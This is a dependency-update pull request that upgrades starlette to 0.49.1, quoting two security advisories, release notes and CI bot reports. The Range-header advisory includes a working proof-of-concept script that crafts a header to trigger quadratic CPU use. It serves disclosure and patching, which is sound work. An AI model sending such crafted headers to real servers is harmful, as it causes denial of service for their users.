Update dependency starlette to v0.49.1 [SECURITY]

[renovate]

This PR contains the following updates:

Package	Change	Age	Confidence
starlette (changelog)	==0.46.0 → ==0.49.1

---

Warning

Some dependencies could not be looked up. Check the Dependency Dashboard for more information.

---

Starlette has possible denial-of-service vector when parsing large files in multipart forms

CVE-2025-54121 / GHSA-2c2j-9gv5-cj73

More information

Details

Summary

When parsing a multi-part form with large files (greater than the default max spool size) starlette will block the main thread to roll the file over to disk. This blocks the event thread which means we can't accept new connections.

Details

Please see this discussion for details: https://github.com/encode/starlette/discussions/2927#discussioncomment-13721403. In summary the following UploadFile code (copied from here) has a minor bug. Instead of just checking for self._in_memory we should also check if the additional bytes will cause a rollover.

    @​property
    def _in_memory(self) -> bool:
        # check for SpooledTemporaryFile._rolled
        rolled_to_disk = getattr(self.file, "_rolled", True)
        return not rolled_to_disk

    async def write(self, data: bytes) -> None:
        if self.size is not None:
            self.size += len(data)

        if self._in_memory:
            self.file.write(data)
        else:
            await run_in_threadpool(self.file.write, data)

I have already created a PR which fixes the problem: https://github.com/encode/starlette/pull/2962

PoC

See the discussion here for steps on how to reproduce.

Impact

To be honest, very low and not many users will be impacted. Parsing large forms is already CPU intensive so the additional IO block doesn't slow down starlette that much on systems with modern HDDs/SSDs. If someone is running on tape they might see a greater impact.

Severity

• CVSS Score: 5.3 / 10 (Medium)
• Vector String: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L

References

• https://github.com/encode/starlette/security/advisories/GHSA-2c2j-9gv5-cj73
• https://github.com/encode/starlette/commit/9f7ec2eb512fcc3fe90b43cb9dd9e1d08696bec1
• https://github.com/encode/starlette/blob/fa5355442753f794965ae1af0f87f9fec1b9a3de/starlette/datastructures.py#L436C5-L447C14
• https://github.com/encode/starlette/discussions/2927#discussioncomment-13721403
• https://nvd.nist.gov/vuln/detail/CVE-2025-54121
• https://github.com/advisories/GHSA-2c2j-9gv5-cj73

This data is provided by the GitHub Advisory Database (CC-BY 4.0).

---

Starlette vulnerable to O(n^2) DoS via Range header merging in starlette.responses.FileResponse

CVE-2025-62727 / GHSA-7f5h-v6xp-fcq8

More information

Details

Summary

An unauthenticated attacker can send a crafted HTTP Range header that triggers quadratic-time processing in Starlette's FileResponse Range parsing/merging logic. This enables CPU exhaustion per request, causing denial‑of‑service for endpoints serving files (e.g., StaticFiles or any use of FileResponse).

Details

Starlette parses multi-range requests in FileResponse._parse_range_header(), then merges ranges using an O(n^2) algorithm.

##### starlette/responses.py
_RANGE_PATTERN = re.compile(r"(\d*)-(\d*)") # vulnerable to O(n^2) complexity ReDoS

class FileResponse(Response):
    @​staticmethod
    def _parse_range_header(http_range: str, file_size: int) -> list[tuple[int, int]]:
        ranges: list[tuple[int, int]] = []
        try:
            units, range_ = http_range.split("=", 1)
        except ValueError:
            raise MalformedRangeHeader()

        # [...]

        ranges = [
            (
                int(_[0]) if _[0] else file_size - int(_[1]),
                int(_[1]) + 1 if _[0] and _[1] and int(_[1]) < file_size else file_size,
            )
            for _ in _RANGE_PATTERN.findall(range_) # vulnerable
            if _ != ("", "")
        ]

The parsing loop of FileResponse._parse_range_header() uses the regular expression which vulnerable to denial of service for its O(n^2) complexity. A crafted Range header can maximize its complexity.

The merge loop processes each input range by scanning the entire result list, yielding quadratic behavior with many disjoint ranges. A crafted Range header with many small, non-overlapping ranges (or specially shaped numeric substrings) maximizes comparisons.

This affects any Starlette application that uses:

• starlette.staticfiles.StaticFiles (internally returns FileResponse) — starlette/staticfiles.py:178
• Direct starlette.responses.FileResponse responses

PoC

#!/usr/bin/env python3

import sys
import time

try:
    import starlette
    from starlette.responses import FileResponse
except Exception as e:
    print(f"[ERROR] Failed to import starlette: {e}")
    sys.exit(1)

def build_payload(length: int) -> str:
    """Build the Range header value body: '0' * num_zeros + '0-'"""
    return ("0" * length) + "a-"

def test(header: str, file_size: int) -> float:
    start = time.perf_counter()
    try:
        FileResponse._parse_range_header(header, file_size)
    except Exception:
        pass
    end = time.perf_counter()
    elapsed = end - start
    return elapsed

def run_once(num_zeros: int) -> None:
    range_body = build_payload(num_zeros)
    header = "bytes=" + range_body
    # Use a sufficiently large file_size so upper bounds default to file size
    file_size = max(len(range_body) + 10, 1_000_000)
    
    print(f"[DEBUG] range_body length: {len(range_body)} bytes")
    elapsed_time = test(header, file_size)
    print(f"[DEBUG] elapsed time: {elapsed_time:.6f} seconds\n")

if __name__ == "__main__":
    print(f"[INFO] Starlette Version: {starlette.__version__}")
    for n in [5000, 10000, 20000, 40000]:
        run_once(n)

"""
$ python3 poc_dos_range.py
[INFO] Starlette Version: 0.48.0
[DEBUG] range_body length: 5002 bytes
[DEBUG] elapsed time: 0.053932 seconds

[DEBUG] range_body length: 10002 bytes
[DEBUG] elapsed time: 0.209770 seconds

[DEBUG] range_body length: 20002 bytes
[DEBUG] elapsed time: 0.885296 seconds

[DEBUG] range_body length: 40002 bytes
[DEBUG] elapsed time: 3.238832 seconds
"""

Impact

Any Starlette app serving files via FileResponse or StaticFiles; frameworks built on Starlette (e.g., FastAPI) are indirectly impacted when using file-serving endpoints. Unauthenticated remote attackers can exploit this via a single HTTP request with a crafted Range header.

Severity

• CVSS Score: 7.5 / 10 (High)
• Vector String: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

References

• https://github.com/Kludex/starlette/security/advisories/GHSA-7f5h-v6xp-fcq8
• https://github.com/Kludex/starlette/commit/4ea6e22b489ec388d6004cfbca52dd5b147127c5
• https://github.com/Kludex/starlette/releases/tag/0.49.1
• https://nvd.nist.gov/vuln/detail/CVE-2025-62727
• https://github.com/Kludex/starlette/commit/69ed26a85956ef4bd0161807eb27abf49be7cd3c
• https://github.com/advisories/GHSA-7f5h-v6xp-fcq8

This data is provided by the GitHub Advisory Database (CC-BY 4.0).

---

Release Notes

Kludex/starlette (starlette)

v0.49.1: Version 0.49.1

Compare Source

This release fixes a security vulnerability in the parsing logic of the Range header in FileResponse.

You can view the full security advisory: GHSA-7f5h-v6xp-fcq8

Fixed

• Optimize the HTTP ranges parsing logic 4ea6e22b489ec388d6004cfbca52dd5b147127c5

---

Full Changelog: Kludex/starlette@0.49.0...0.49.1

v0.49.0: Version 0.49.0

Compare Source

Added

• Add encoding parameter to Config class #​2996.
• Support multiple cookie headers in Request.cookies #​3029.
• Use Literal type for WebSocketEndpoint encoding values #​3027.

Changed

• Do not pollute exception context in Middleware when using BaseHTTPMiddleware #​2976.

---

New Contributors

• @​TheWesDias made their first contribution in #​3017
• @​gmos2104 made their first contribution in #​3027
• @​secrett2633 made their first contribution in #​2996
• @​adam-sikora made their first contribution in #​2976

Full Changelog: Kludex/starlette@0.48.0...0.49.0

v0.48.0: Version 0.48.0

Compare Source

Added

• Add official Python 3.14 support #​3013.

Changed

• Implement RFC9110 http status names #​2939.

---

New Contributors

• @​yakimka made their first contribution in #​2943
• @​mbeijen made their first contribution in #​2939

Full Changelog: Kludex/starlette@0.47.3...0.48.0

v0.47.3: Version 0.47.3

Compare Source

Fixed

• Use asyncio.iscoroutinefunction for Python 3.12 and older by @​mjpieters in encode#2984

---

New Contributors

• @​mjpieters made their first contribution in encode#2984

Full Changelog: Kludex/starlette@0.47.2...0.47.3

v0.47.2

Compare Source

Fixed

• Make UploadFile check for future rollover #​2962.

---

New Contributors

• @​HonakerM made their first contribution in encode#2962

Full Changelog: Kludex/starlette@0.47.1...0.47.2

v0.47.1: Version 0.47.1

Compare Source

Fixed

• Use Self in TestClient.__enter__ #​2951
• Allow async exception handlers to type-check #​2949

---

Full Changelog: Kludex/starlette@0.47.0...0.47.1

v0.47.0: Version 0.47.0

Compare Source

Added

• Add support for ASGI pathsend extension #​2671.
• Add partitioned attribute to Response.set_cookie #​2501.

Changed

• Change methods parameter type from list[str] to Collection[str] #​2903.
• Replace import typing by from typing import ... in the whole codebase #​2867.

Fixed

• Mark ExceptionMiddleware.http_exception as async to prevent thread creation #​2922.

---

New Contributors

• @​danlapid made their first contribution in encode#2922
• @​Flecart made their first contribution in encode#2501
• @​AllenSH12 made their first contribution in encode#2936
• @​waketzheng made their first contribution in encode#2867
• @​jonathanberthias made their first contribution in encode#2903

Full Changelog: Kludex/starlette@0.46.2...0.47.0

v0.46.2: Version 0.46.2

Compare Source

What's Changed

• Use correct index on backwards compatible logic in TemplateResponse by @​alex-oleshkevich in encode#2909
• Prevents reraising of exception from BaseHTTPMiddleware by @​ramannanda9 in encode#2911

New Contributors

• @​ahryniv made their first contribution in encode#2913
• @​ramannanda9 made their first contribution in encode#2911

Full Changelog: Kludex/starlette@0.46.1...0.46.2

v0.46.1: Version 0.46.1

Compare Source

Fixed

• Allow relative directory path when follow_symlinks=True #​2896.

---

Full Changelog: Kludex/starlette@0.46.0...0.46.1

---

Configuration

📅 Schedule: (UTC)

• Branch creation
  • ""
• Automerge
  • At any time (no schedule defined)

🚦 Automerge: Disabled by config. Please merge this manually once you are satisfied.

♻ Rebasing: Whenever PR becomes conflicted, or you tick the rebase/retry checkbox.

🔕 Ignore: Close this PR and you won't be reminded about this update again.

---

• If you want to rebase/retry this PR, check this box

---

This PR was generated by Mend Renovate. View the repository job log.

[sonarqubecloud]

Quality Gate passed

Issues
0 New issues
0 Accepted issues

Measures
0 Security Hotspots
0.0% Coverage on New Code
0.0% Duplication on New Code

See analysis details on SonarQube Cloud

[codecov-commenter]

Codecov Report

✅ All modified and coverable lines are covered by tests.
✅ Project coverage is 90.22%. Comparing base (504af4c) to head (f620a3d).

Additional details and impacted files

@@           Coverage Diff           @@
##             main      #35   +/-   ##
=======================================
  Coverage   90.22%   90.22%           
=======================================
  Files          34       34           
  Lines        1013     1013           
  Branches      118      118           
=======================================
  Hits          914      914           
  Misses         62       62           
  Partials       37       37           

☔ View full report in Codecov by Sentry.
📢 Have feedback on the report? Share it here.

[sonarqubecloud]

Quality Gate passed

Issues
0 New issues
0 Accepted issues

Measures
0 Security Hotspots
0.0% Coverage on New Code
0.0% Duplication on New Code

See analysis details on SonarQube Cloud